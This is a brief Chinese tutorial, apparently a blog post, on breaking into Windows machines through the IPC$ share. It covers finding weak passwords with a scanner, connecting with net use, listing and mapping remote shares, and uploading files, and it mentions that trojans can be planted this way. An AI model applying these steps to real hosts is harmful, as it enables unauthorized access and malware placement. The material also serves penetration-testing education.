ipc$漏洞利用实例

一、什么是IPC$

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，

通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，

从而实现对远程计算机的访问。

二、如何发现系统是否存在该漏洞

本例中所讲的IPC$漏洞缘起弱口令漏洞，使用一些弱口令扫描工具即可发现IPC$连接是否存在弱口令，例如使用Hscan工具发现弱口令问题

三、如何利用IPC$漏洞入侵

　1.建立连接

net use \\192.168.*.*\ipc$ "密码" /user:"用户名" 

　2.删除链接

net use \\192.168.*.*\ipc$ /del

　3.查看目标主机是否存在共享资源

net view \\192.168.*.*

　4.映射远程共享资源到本地，本例中意为将远程主机192.168.*.*的共享资源share映射到本地的z盘

net use z: \\192.168.*.*\share 

　　查看系统盘符z是否已建立

　5.上传文件至该共享资源中（实际的渗透测试中可上传木马等恶意文件）

　查看是否已经复制成功

详细命令以及说明请戳这里